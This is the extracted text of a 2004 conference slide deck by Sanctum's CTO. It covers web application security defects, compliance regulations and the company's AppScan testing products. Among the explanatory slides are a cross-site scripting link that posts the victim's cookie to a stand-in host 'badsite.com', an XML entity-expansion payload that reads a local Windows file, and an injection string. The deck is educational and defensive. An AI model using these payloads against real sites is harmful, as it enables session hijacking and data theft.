ISSA Delaware Valley Chapter MeetingISSA Delaware Valley Chapter MeetingAchieving Enterprise SecurityAchieving Enterprise Security through through

CollaborationCollaboration

Steve OrrinCTO

Sanctum Inc.

Recent News

Man admits hacking

into NY Times

-MSNBC

Jan 8, 2004

Hackers attack eBay

accounts— ZDNet NewsMar 25,2002

CA State Agency warns of

Security Breach

— CNET News, Feb 13, 2004Sites Revealed Passwords

For Thousands Of

Ameritech Users —

NewsBytes Feb 22,2002

US Port hit by UK Hacker

— BBC, Oct 6,2003

FBI investigates hack at

e-voting software

company - News.com, Dec 30, 2003

Glitch at Fidelity Canada

exposes customer information

— ComputerWorld, May 30, 2002

Hacker Accesses

2.2 Million Credit

Cards - CNN, Feb 18,2003

Hacker steals 13,000

credit card numbers from US

Navy• Washington Post, Aug 23,

2003

NASA Sites Hacked— ComputerWorld, Dec 17, 2003

Hackers get Acxion Customer Information — ComputerWorld Aug 9, 2003

FTD.com hole leaks

personal information

— CNet, Feb 13, 2003

FTC investigates PetCo.com security holes — SecurityFocus, Dec

5, 2003

Impact of Security Defects

Bad Business Bad Business

• On average, there are 5 to 15 defects in every 1,000 lines of code

US Dept. of Defense and the Software Engineering Institute

Slow Business Slow Business

• It takes 75 minutes on average to track down one defect. Fixing one of these defects takes 2 to 9 hours each

5 Year Pentagon Study

• Researching each of the 4,200 vulnerabilities published by CERT last year for 10 minutes would have required 1 staffer to research for 17.5 full workweeks or 700 hours

Intel White paper, CERT, ICSA Labs

Loss of BusinessLoss of Business

• A company with 1,000 servers can spend $300,000 to test & deploy a patch; most companies deploy several patches a week

Gartner Group

Pressures on the Application Lifecycle Increasing

Time-to-Market• Bringing new applications to market quickly

Complexity is Growing

• Increased application lifecycle complexity

Increasing Business Risks Driven by Security Defects

• Rise in Hacker activity

• Government scrutiny and regulation pressures (HIPAA, GLBA, SB1386, etc..)

• Liability precedents for security defects

Costs Escalate Dramatically the longer you wait to Find and Fix

• Bad software costs the economy $59.5 billion a year- cost of breakdowns and repairs (Nat. Institute of Standards & Technology, May 2002)

3. Audit

2. Test

1. Develop

4. Operate

Why Application Security Defects Matter

Frequent

• 3 out of 4 business websites are vulnerable to attack (Gartner)

Pervasive

• 75% of hacks occur at the Application level (Gartner)

Undetected

• QA testing tools not designed to detect security defects in applications

• Manual patching - reactive, never ending, time consuming & expensive

Dangerous

• When exploited, security defects destroy company value and customer trust

>2000 application ‘Healthchecks’ with AppScan – 98% vulnerable: all had firewalls and encryption solutions in place…

32% Hijack Session/

Identity Theft

11% e-Shoplifting

21% Full Control and Access to

Information

2% Delete Web Site

27% Privacy Breach

7% Modify Information

Business Impact of Application Hacks

Through a browser, a hacker can use even the smallest bug or backdoor to accomplish identity theft, fraud, denial of service and to obtain and manipulate

Customer and Consultants records

Misdirect customers to bogus site

Change parameters ie.total contribution>100%

Application Threat Negative Impact Example Business Impact

Buffer overflow Denial of Service (DoS) Site Unavailable to Customers

Cookie poisoning Session Hijacking Cash out someone else’s account

Hidden fields Alter site, Illegal transactions Change hidden fields ie. Account Balance

Debug options Admin Access Access to all accounts and information

Cross Site scripting Identity Theft Allows intruder transfer of funds

Stealth Commanding Access O/S and Application Get list of customer accounts

Parameter Tampering Fraud, Data Theft Alter distributions and transfer accounts

Forceful Browsing/

SQL Injection

Unauthorized Site/Data Access Administrative privileges to database with read/write access

3rd Party Misconfiguration Admin Access Create new unauthorized database of customers

Published Vulnerabilities Admin Access, DoS Create new unauthorized account

Legislation: Validation and Reporting Required

• GLBAGLBA:: mandatory privacy and security standards in financial services industry (and enforced by the FTC)

• HIPAA:HIPAA: mandatory privacy and security standards in healthcare industry

• FERC:FERC: mandatory privacy and security standards in energy industry

• SB1386:SB1386: Calif law requires companies to warn consumers when personal information may have been stolen

• Sarbanes-Oxley: Sarbanes-Oxley: mandatory auditing controls requiring CEO/CFO to certify adequate “internal control” safeguards are in place

• Putnam Bill (still in debate)Putnam Bill (still in debate) – mandatory security audits

Identity Theft complaints come to the FTC at Identity Theft complaints come to the FTC at more than 13,000/monthmore than 13,000/month

RegulationFinancial Services Insurance Banking Healthcare Pharmaceutical Gov’t

Sarbanes-Oxley Act of 2002

HIPAA

California SB 1386

USA Patriot Act

Gramm-Leach Bliley Act

Government and Industry Regulations Impact Matrix on Internet Security

Source: IDC, 2003 (modified)

Yellow = Minor Impact, Orange = Medium Impact, Red = Major Impact

Example: Cross Site Scripting

• Vulnerability explanationVulnerability explanation:

Extremely common: A flaw in server’s web page leads to compromise in a client

A third party creates a link (or sends an email) and the URL contains a parameter with a script – once the user connects, the site runs this script

• Why Cross Site ScriptingWhy Cross Site Scripting:Many parameters are implanted within the HTML of following responses, while not checking their content for scripts

• As a result of this manipulationAs a result of this manipulation:“Virtual hijacking” of the session. Any information flowing between the legitimate

user and site can be manipulated or transmitted to the evil 3rd party. The fault is simply echoing user input! (Trusting user input!!)

CSS In Action

Welcome.aspHello,<%= request.querystring(‘name’)%>

Owns badsite.com

CSS In Action

<a href= http://www.insecuresite.com/welcome.asp?name= <FORM action=http://www.badsite.com/data.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT>>here</a>

Web Services Threats

XML/Web Services Attack Vectors

• Old Attacks still validOld Attacks still valid– CWV’s– Injection Attacks– Buffer Overflow– Denial of Service

• The New Manipulation AttacksThe New Manipulation Attacks– Entity and Referral Attacks– DTD and Schema Attacks

• The Next Generation AttacksThe Next Generation Attacks– Web Service Enabled Application Attacks– Multi-Phase Attacks

Command Injection SOAP Attacks

SQL Injection in

XQuery

Cross-Site Scripting in

Client Side XML

Documents

SAP/BAPI attacks via

SOAP

Entity Expansion Attacks

Endless loop Denial of

service Attacks

Schema Redirection Attacks

XPATH Injection

XML Attack Example (Entity Expansion)

An attack on XXX Application ServerAn attack on XXX Application Server1. Find a web service which echoes

back user data such as the parameter "in"

2. Use the following SOAP request

3. And you'll get

C:\WinNT\Win.ini in the response (!!!)

How it works:How it works:A. XXX App Server expands the entity “foo” into full text, gotten from

the entity definition URL - the actual attack takes place at this phase (by XXX Application Server itself)

B. XXX App Server feeds input to the web service

C. The web service echoes back the data

...<!DOCTYPE root [

<!ENTITY foo SYSTEM "file:///c:/winnt/win.ini">]>...<in>&foo;</in>

Next Generation Attacks:XPath Injection

• Query based injection attack targeting Web applications using XML data sources (XML documents and XML Databases)

• Why XPath Injection?

– Traditional Query Injection: ' or 1=1 or ''='

– XPath Blindfolded Injection

• Attacker extracts information per a single query injection. The novelty is:

– No prior knowledge of XPath query format required (unlike “traditional” SQL Injection attacks).

– Whole XML document eventually extracted, regardless of XPath query format used by application

• Defending against XPath injection (similar to defending against SQL injection)

• The application must sanitize/validate user input

• Use an application firewall in front of the web site

Next Generation Attacks:HTTP Response Splitting

• A new carrier affecting Web Server communications to perform old A new carrier affecting Web Server communications to perform old attacks in a more elegant and malicious way….attacks in a more elegant and malicious way….

• Hackers can easily and with greater immunity perform the following Hackers can easily and with greater immunity perform the following attacks:attacks:– Web Cache Poisoning (new type of attack)

• poisoning the reverse proxy cache – defacement

• poisoning an intermediate cache server – next generation phishing

• poisoning a browser cache – targeted attack

– Hijacking a page (HTTP response) with user sensitive information • Diverts a response intended for a client, to the attacker

– Cross-site scripting (XSS)• New way to implement XSS with above mentioned added ‘benefits’

Anti-Forensics Properties:A step toward the "perfect hack" !

• Easily reversible - manually by attacker and as part of normal Easily reversible - manually by attacker and as part of normal cache operationscache operations– The nature of the attack hampers incident response activities– Allows for removal of evidence– Allows the attacker to more easily cloak the evidence of attack– Web Caching is rarely logged

• End result: a novice cracker can hack with a level of impunity End result: a novice cracker can hack with a level of impunity once reserved for the very skilledonce reserved for the very skilled

How it works

• Normal Request – Response scenario• User sends request to a Web server/application & Web server /

application process request and sends response

• Attack scenario 1: Attack request (normal request with embedded attack) with 2 responses

• Attacker sends attack request to a web server/application• Web server/application process request• When Web server interprets response from application the attack

‘tricks’ the Web server into breaking the response and sends a second request (the embedded attack request)

• The attack request is sent to user/cache

• Root cause • Poor user input validation

The Heart of the Issue: Input Trust

• “All input is evil, until proven otherwise!”– The root of most serious vulnerabilities

• Buffer Overruns• Canonicalization issues• Cross-site Scripting (XSS) attacks• SQL Injection attacks • Integer overflow attacks

• Good guys give you well-formed data, bad guys don’t!

• Don’t rely on your client application providing clean data– Don’t assume attackers play by the rules– They go ‘under the radar’

Input Remedies

• Require authenticated connections

• Sanitize all input from untrusted sources– Look for valid data– Reject everything else– High-level languages can use RegExp

• SSN = ^\d{3}-\d{2}-\d{4}$

• Make no assumptions about the trustworthiness of data

• Never directly echo Web-based user input– Verify input, then echo it– At the very least, HTML or URL encode the output

Introducing Risk Early: The Vicious Cycle

Design, Develop, & TestDesign, Develop, & TestStagingStaging

Deployment & OperationsDeployment & Operations

ProductionProduction

Responsibilities– Develop high quality secure apps

Tools– IDEs – Performance & functionality QA tools– Manual test scripts and code review– Freeware

Challenges– Don’t have the tools, time or training for security testing

Result– Dangerous security defects passed downstream to operations– Code comes back to development to work on again……

Responsibilities– Audit apps before/after deployment– Patch & fix – Communicate to development

Tools– Network Scanners – Vulnerability Assessment Tools

Challenges– Ran out of time! – Being measured on deployment – not sending back to development

Results– Kept waiting for quality software to deploy– Anxious about overall software quality deployed – the next attack….

Development is fertile ground for security bugs…

Ops, Admins, & Auditors are expensive exterminators…

Automated Security Testing for the Application Lifecycle

Develop (Developer): • Construct application• Unit test application components

Test (Tester/ QA Engineer): • Create test plan• Create, run & manage test scripts• Defect assignment & tracking • Delta, trend and results analysis• Approve release to production

Audit (Ops & Security Auditor): • Create operations plan• Deploy & maintain business compliance• Scheduled (or not!) application audits

AuditAudit

TestTest

DevelopDevelop

Financial Impact

Cost to Fix dramatically increases Cost to Fix dramatically increases the longer you wait to testthe longer you wait to test

100

50

25

75

Percent of Applications

Cost of Backlog:Statistics from 10 F100 Companies

half of 20% never pass

3 half of 20% pass

1

92% of applications fail security testing

8% pass

2

80% pass

20% fail

= 2.5 month avg. delay > $25M in lost savings/revenue

The Bottom Line

Costs of defects introduced early in lifecycle quickly add-up

• Untested applications in production

• Longer development cycles

• More development cycles

• Considerable business risks

Understand, Communicate, Measure

• UnderstandUnderstand your exposure your exposure

• Use tools that scan for exposure points at the web server and application layers as part of application development process

• The data collected must be relevant to the audience receiving it

• The importance of terminology and types of data provided

• CommunicateCommunicate your the exposures (security defects) your the exposures (security defects)

• Various stake holders in the development lifecycle need different types of data

• Use the tracking tools already in place

• Map security defects to business needs

• Measure Measure your assessment process / security defect your assessment process / security defect remediationremediation

• Analyze exposure from individual assessments and compare results across the cycle

Understand

Communicate: Developers/QA…the right data for the right audience

Communicate: Prod Mgmt…the right data for the right audience

Communicate: Auditors…the right data for the right audience

Measure Trend Analysis

From Vicious to Virtuous Development Cycle

Give developers, QA and administrators the tools and training they need to succeed!

The Result: Address Compliance

Application Threat Impacts GLBA / HIPAA

GLBA/HIPAA Mandate Security Testing

Addresses

Buffer overflow

Cookie poisoning

Hidden fields

Debug options

Cross Site scripting

Stealth Commanding

Parameter Tampering

Forceful Browsing/

SQL Injection

3rd Party Misconfiguration

Published Vulnerabilities

• Ensure the security & confidentiality of customer records and information

• Protect against any unanticipated threat or hazard to the security or integrity of these records

• Protect against unauthorized access that could result in substantial harm or inconvenience to customer

Network devices do not detect these vulnerabilities

The Result:Address Compliance

Application Threat Impacts SB 1386

SB 1386 Mandate Security Testing

Addresses

Buffer overflow

Cookie poisoning

Hidden fields

Debug options

Cross Site scripting

Stealth Commanding

Parameter Tampering

Forceful Browsing/

SQL Injection

3rd Party Misconfiguration

Published Vulnerabilities

• Prevent unauthorized access to California customers or employee personal information

• Penalty of breach: each customer/employee must be individually notified in writing of breach in confidentiality in less than two weeks.

•Otherwise, a public announcement to the press must occur

Automated Web Application Testing and Risk Assessment

S.A.F.E.:S.A.F.E.: Speed, Accuracy, Flexibility and Efficiency Speed, Accuracy, Flexibility and Efficiency

Site SmartSite Smart for QA and Audit: for QA and Audit:• Seamlessly integrates into any QA or Audit environment• Tests both new and existing Internet infrastructures• Ensures Compliance of security best practices and external regulations

Application Lifecycle Security: Application Lifecycle Security: Accelerates ROIAccelerates ROI • increased revenue • increased customer satisfaction • decreased customer acquisition and retention costs

Application Lifecycle Security to increase the Speed and Ease of Application Deployment in a Secure Environment

Application Security Across the Lifecycle

• Incorporate security into the process – early on and at each stage• Document and report – demonstrate compliance• Improve overall result• Reduce costs

1. Develop 2. Test 3. Audit 4. Operate

AppScan DE AppScan QAAppScan

Audit AppShield

RELIABILITYRELIABILITY ASSURANCEASSURANCE VALIDATIONVALIDATION CONFIDENCECONFIDENCE

Create‘hacker resistant’

applications

Testapplication quality

Audit for security and

compliance

Maintainapplication integrity

and userconfidence

Q&A

Steve Orrin, CTOSanctum, Inc.

sorrin@sanctuminc.comwww.sanctuminc.com

For More Information:

Sanctum, Inc

Sanctuminquiry@sanctuminc.com

Toll free: (877) 888-3970